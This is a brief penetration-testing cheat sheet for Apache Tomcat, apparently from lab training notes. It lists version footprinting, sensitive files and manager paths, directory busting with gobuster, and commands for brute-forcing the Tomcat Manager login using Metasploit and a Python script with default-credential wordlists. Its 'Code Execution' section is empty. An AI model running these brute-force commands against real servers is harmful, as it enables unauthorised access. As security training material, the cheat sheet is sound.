Tomcat

Footprinting & Enumeration

# Finding Version
curl -s <http://site.local:8080/docs/> | grep Tomcat

# Important files adn folders to look for information
tomcat-users.xml
web.xml

/manager
/host-manager

Gobuster

# Directory Busting
gobuster dir -u http:/site.local:8180/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

Attacking

Brute Forcing

# Tomcat Manager - Login Brute Force
# Metasploit 
use auxiliary/scanner/http/tomcat_mgr_login
set VHOST web01.inlanefreight.local
set RPORT 8180
set stop_on_success true
set rhosts ip

# Python Script
# LINK : <https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce>
python3 mgr_brute.py -U <http://site.local:8180/> -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt

Code Execution

Last updated